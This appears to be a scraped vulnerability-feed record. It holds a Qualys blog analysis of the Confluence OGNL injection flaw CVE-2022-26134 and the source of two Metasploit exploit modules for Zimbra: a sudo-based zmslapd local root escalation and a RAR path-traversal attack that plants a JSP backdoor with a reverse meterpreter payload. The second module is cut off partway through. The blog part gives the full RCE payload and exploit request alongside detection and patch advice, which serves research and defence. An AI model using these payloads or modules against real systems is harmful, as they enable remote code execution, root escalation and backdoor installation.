detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n## About CVE-2022-26134\n\nCVE-2022-26134 is an unauthenticated OGNL Injection remote code execution vulnerability affecting Confluence Server and Data Center versions after 1.3.0. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited it would allow the attacker to execute commands remotely with user privileges running the Confluence application. 
The vulnerability is fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.\n\n### OGNL Injection\n\nObject-Graph Navigation Language (OGNL) is an open-source Expression Language (EL) used for getting and setting the properties of Java objects. An OGNL Injection occurs when there is insufficient validation of user-supplied data, and the EL interpreter attempts to interpret it enabling attackers to inject their own EL code.\n\nIn the case of CVE-2022-26134, the RCE attack is not complex in nature. The attack can be executed by simply sending the OGNL payload in the request URI. The payload can be crafted to add a custom HTTP response header that prints the output of successfully executed remote commands.\n\nRCE Payload\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Qualys-Response\",#a))}\n\nBreaking the above payload, variable `a` is assigned the value of an expression which calls various static methods using syntax `@class@method(args)`, where `java.lang.Runtime` class calls `exec` method which executes `id` command and the output is stored in the variable `a`.\n\nNext, from package `com.opensymphony.xwork2` class `ServletActionContext` is called which uses `getResponse` and `setHeader` method to fetch response of `id` system command in `X-Qualys-Response` custom header.\n\n### Exploit POC\n\nREQUEST\n \n \n GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n Host: 127.0.0.1:8090\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0\n Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nRESPONSE\n \n \n HTTP/1.1 302 \n Cache-Control: no-store\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n X-Confluence-Request-Time: 1655819234897\n Set-Cookie: JSESSIONID=7AE586C9E49E2301BA33E5A1552D8C6F; Path=/; HttpOnly\n X-XSS-Protection: 1; mode=block\n X-Content-Type-Options: nosniff\n X-Frame-Options: SAMEORIGIN\n Content-Security-Policy: frame-ancestors 'self'\n X-Qualys-Response: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence)\n Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n Content-Type: text/html;charset=UTF-8\n Content-Length: 0\n Date: Tue, 21 Jun 2022 13:47:14 GMT\n Connection: close\n\nOnce the exploit is triggered it can be seen `X-Qualys-Response` HTTP response header contains the output of the `id` system command resulting in successful exploitation of this remote code execution vulnerability.\n\n## Exploit Analysis\n\nWhile analyzing the above RCE request, the Qualys WAS research team came across the Catalina log file in Confluence Server stored at `/opt/atlassian/confluence/logs/catalina.YYYY-MM-DD.log` which had multiple entries of web requests sent, along with output from `stdout` and `stderr`. 
Following is the snippet from the log file printing the stack trace for the RCE request:\n\n* * *\n \n \n 07-Jun-2022 10:37:00.565 WARNING [Catalina-utility-4] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-17] (id=[347]) has been active for [75,417] milliseconds (since [6/7/22 10:35 AM]) to serve the same request for [http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [1] thread(s) in total that are monitored by this Valve and\n may be stuck.\n java.lang.Throwable\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1247)\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)\n at ognl.OgnlParser.primaryExpression(OgnlParser.java:1494)\n at ognl.OgnlParser.navigationChain(OgnlParser.java:1245)\n [..SNIP..]\n at ognl.Ognl.parseExpression(Ognl.java:113)\n at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\n at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\n [..SNIP..]\n at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n at java.base@11.0.15/java.lang.Thread.run(Thread.java:829)\n\n* * *\n\n
Analyzing the stack, `com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)` appears to be the source where the injection occurs. Execution flows up to `com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)`, where the [`execute`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>) method calls the [`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method of the [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class, `com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)`. This appears to be the sink where the OGNL expression is evaluated: it invokes the [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) method of the `OgnlValueStack` class, `com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)`, which goes on to parse the OGNL expression with `com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)` and multiple other classes.\n\n### Source Code Analysis\n\nTo better understand the execution flow of this RCE vulnerability, we need to dive into the source code of these classes:\n\n
Starting with the [`ServletDispatcher`](<https://docs.atlassian.com/DAC/javadoc/opensymphony-webwork/1.4-atlassian-17/reference/webwork/dispatcher/ServletDispatcher.html>) class:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nServletDispatcher\n\n
The `getNamespaceFromServletPath` method is used to obtain the namespace to which an Action belongs.\n\nFor example, when a malicious request `http://127.0.0.1:8090/<RCE payload>/` is fired, the line `servletPath.substring(0, servletPath.lastIndexOf(\"/\"));` treats everything before the last trailing slash as the namespace. Hence the namespace `<RCE payload>` is created from the malicious request URI.\n\nAs a result, the trailing slash is an essential component for the exploit to work; if it is omitted, the payload won\u2019t work.\n\nThis namespace is then used by the `execute` method, via the `this.namespace` expression, inside [`ActionChainResult`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>):\n \n \n public void execute(final ActionInvocation invocation) throws Exception {\n if (this.namespace == null) {\n this.namespace = invocation.getProxy().getNamespace();\n }\n final OgnlValueStack stack = ActionContext.getContext().getValueStack();\n final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n if (this.isInChainHistory(finalNamespace, finalActionName)) {\n throw new XworkException(\"infinite recursion detected\");\n }\n \n\nActionChainResult\n\n
Here, the `translateVariables` method of the `TextParseUtil` class is called on the `this.namespace` expression; it converts every instance of `${...}` in the expression to the value returned by a call to `OgnlValueStack.findValue`.\n\nMoving on to the [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class code:\n \n \n package com.opensymphony.xwork.util;\n \n import java.util.regex.Matcher;\n import java.util.regex.Pattern;\n \n public class TextParseUtil\n {\n public static String translateVariables(final String expression, final OgnlValueStack stack) {\n final StringBuilder sb = new StringBuilder();\n final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n final Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n final String g = m.group(1);\n final int start = m.start();\n String value;\n try {\n final Object o = stack.findValue(g);\n value = ((o == null) ? \"\" : o.toString());\n }\n catch (Exception ignored) {\n value = \"\";\n }\n sb.append(expression.substring(previous, start)).append(value);\n previous = m.end();\n }\n if (previous < expression.length()) {\n sb.append(expression.substring(previous));\n }\n return sb.toString();\n }\n }\n \n\nTextParseUtil\n\n
The [`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method takes two parameters: `expression`, a string that has not yet been translated, and `stack`, the value stack against which dynamic OGNL expressions are evaluated.\n\nIn `final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");`, the `Pattern` class defines the pattern to be searched for, compiled with the `Pattern.compile()` method.\n\nIn Java a single backslash `\\` is an escape character in strings. Hence double backslashes `\\\\` are used in the regex above, `\\\\$\\\\{([^}]*)\\\\}`, to escape the `$`, `{` and `}` characters.\n\nThe next line, `final Matcher m = p.matcher(expression);`, uses the `matcher()` method to search for the pattern in the string, for example in `${qualys.rce.payload}`.\n\nThe contents of the round brackets (the capturing group) in the regular expression `\\\\$\\\\{([^}]*)\\\\}` are then extracted with `final String g = m.group(1);` and passed to `final Object o = stack.findValue(g);`.\n\nFinally, [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) finds the value by evaluating the given expression against the stack in the default search order.\n\nAs a result, when a remote attacker requests a malicious URI `http://127.0.0.1:8090/${rce_payload}/`, `${rce_payload}` is first turned into the namespace; `TextParseUtil.translateVariables` then extracts the payload, and `findValue` evaluates the OGNL expression `rce_payload`, causing Remote Code Execution.\n\n
## Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability on the target Confluence application with Qualys Web Application Scanning using the following QID:\n\n * 150523: Atlassian Confluence Server and Data Center OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected, users will see the following results in the vulnerability scan report:\n\n\n\n## Solution\n\nDue to the Critical severity and active exploitation of this vulnerability, organizations using Confluence are strongly advised to upgrade to version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later to remediate CVE-2022-26134. More information on patching and workarounds is available in the [Confluence Security Advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>).\n\n
## Credits\n\n**Confluence Security Advisory:** <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>\n\n**CVE Details:**\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26134>\n\nCredit for the vulnerability discovery goes to [Volexity](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>).\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1533805332409069568/photo/1>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Rajesh Kumbhar**, Senior Software Engineer, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T20:23:28", "type": "qualysblog", "title": "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T20:23:28", "id": "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-03T15:23:51", "description": "This module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T18:55:05", "type": "metasploit", "title": "Zimbra zmslapd arbitrary module load", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2023-03-27T15:46:07", "id": "MSF:EXPLOIT-LINUX-LOCAL-ZIMBRA_SLAPPER_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/zimbra_slapper_priv_esc/", "sourceData": 
"##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::Kernel\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Zimbra zmslapd arbitrary module load',\n 'Description' => %q{\n This module exploits CVE-2022-37393, which is a vulnerability in\n Zimbra's sudo configuration that permits the zimbra user to execute\n the zmslapd binary as root with arbitrary parameters. As part of its\n intended functionality, zmslapd can load a user-defined configuration\n file, which includes plugins in the form of .so files, which also\n execute as root.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Darren Martyn', # discovery and poc\n 'Ron Bowes', # Module\n ],\n 'DisclosureDate' => '2021-10-27',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Privileged' => true,\n 'References' => [\n [ 'CVE', '2022-37393' ],\n [ 'URL', 'https://web.archive.org/web/20221002011602/https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ],\n ],\n 'Targets' => [\n [ 'Auto', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n register_options [\n OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]),\n OptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]),\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n # 
Because this isn't patched, I can't say with 100% certainty that this will\n # detect a future patch (it depends on how they patch it)\n def check\n # Sanity check\n if is_root?\n fail_with(Failure::None, 'Session already has root privileges')\n end\n\n unless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\")\n return CheckCode::Safe\n end\n\n unless command_exists?(datastore['SUDO_PATH'])\n print_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\")\n return CheckCode::Safe\n end\n\n # Run `sudo -n -l` to make sure we have access to the target command\n cmd = \"#{datastore['SUDO_PATH']} -n -l\"\n print_status \"Executing: #{cmd}\"\n output = cmd_exec(cmd).to_s\n\n if !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')\n print_error('Current user could not execute sudo -l')\n return CheckCode::Safe\n end\n\n if !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\")\n print_error('Current user does not have access to run zmslapd')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n base_dir = datastore['WritableDir'].to_s\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n # Generate a random directory\n exploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n if file_exist?(exploit_dir)\n fail_with(Failure::BadConfig, 'Exploit dir already exists')\n end\n\n # Create the directory and get ready to remove it\n print_status(\"Creating exploit directory: #{exploit_dir}\")\n mkdir(exploit_dir)\n register_dir_for_cleanup(exploit_dir)\n\n # Generate some filenames\n library_name = \".#{rand_text_alphanumeric(5..10)}.so\"\n library_path = \"#{exploit_dir}/#{library_name}\"\n 
config_name = \".#{rand_text_alphanumeric(5..10)}\"\n config_path = \"#{exploit_dir}/#{config_name}\"\n\n # Create the .conf file\n config = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\"\n write_file(config_path, config)\n\n write_file(library_path, generate_payload_dll)\n\n cmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\"\n print_status \"Attempting to trigger payload: #{cmd}\"\n out = cmd_exec(cmd)\n\n unless session_created?\n print_error(\"Failed to create session! Cmd output = #{out}\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/zimbra_slapper_priv_esc.rb", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:23:28", "description": "This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. 
This issue is exploitable on the following versions of Zimbra, provided UnRAR version 6.11 or earlier is installed: * Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-27T19:45:47", "type": "metasploit", "title": "UnRAR Path Traversal in Zimbra (CVE-2022-30333)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-12-06T14:07:28", "id": "MSF:EXPLOIT-LINUX-HTTP-ZIMBRA_UNRAR_CVE_2022_30333-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/zimbra_unrar_cve_2022_30333/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Format::RarSymlinkPathTraversal\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 
'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',\n 'Description' => %q{\n This module creates a RAR file that can be emailed to a Zimbra server\n to exploit CVE-2022-30333. If successful, it plants a JSP-based\n backdoor in the public web directory, then executes that backdoor.\n\n The core vulnerability is a path-traversal issue in unRAR that can\n extract an arbitrary file to an arbitrary location on a Linux system.\n\n This issue is exploitable on the following versions of Zimbra, provided\n UnRAR version 6.11 or earlier is installed:\n\n * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)\n * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)\n },\n 'Author' => [\n 'Simon Scannell', # Discovery / initial disclosure (via Sonar)\n 'Ron Bowes', # Analysis, PoC, and module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2022-30333'],\n ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],\n ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],\n ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],\n ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],\n ],\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n [ 'Zimbra Collaboration Suite', {} ]\n ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',\n 'TARGET_FILENAME' => nil,\n 'DisablePayloadHandler' => false,\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Stance' => Msf::Exploit::Stance::Passive,\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'DisclosureDate' => '2022-06-28',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n OptString.new('FILENAME', 
[ false, 'The file name.', 'payload.rar']),\n\n # Separating the path, filename, and extension allows us to randomize the filename\n OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']),\n OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),\n OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),\n\n # Took this from multi/handler\n OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),\n OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])\n ]\n )\n end\n\n # Generate an on-system filename using datastore options\n def generate_target_filename\n if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')\n print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')\n end\n\n File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\")\n end\n\n # Normalize the path traversal and figure out where it is relative to the web root\n def zimbra_get_public_path(target_filename)\n # Normalize the path\n normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath\n\n # Figure out where it is, relative to the webroot\n webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')\n relative_path = normalized_path.relative_path_from(webroot)\n\n # Hopefully, we found a path from the webroot to the payload!\n if relative_path.to_s.start_with?('../')\n return nil\n end\n\n relative_path\n 
end\n\n def exploit\n print_status('Encoding the payload as a .jsp file')\n payload = Msf::Util::EXE.to_jsp(generate_payload_exe)\n\n # Create a file\n target_filename = generate_target_filename\n print_status(\"Target filename: #{target_filename}\")\n\n # Sanity check - the file shouldn't exist, but we should be able to do requests to the server\n if datastore['TRIGGER_PAYLOAD']\n # Get the public path for triggering the vulnerability, terminate if we\n # can't figure it out\n public_filename = zimbra_get_public_path(target_filename)\n if public_filename.nil?\n fail_with(Failure::Unknown, 'Could not determine the public web path')\n end\n\n print_status('Checking the HTTP connection to the target')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(public_filename)\n )\n\n unless res\n fail_with(Failure::Unknown, 'Could not connect to the server via HTTP (disable TRIGGER_PAYLOAD if you plan to trigger it manually)')\n end\n\n # Break when the file successfully appears\n unless res.code == 404\n fail_with(Failure::Unknown, \"Server returned an unexpected result when we attempted to 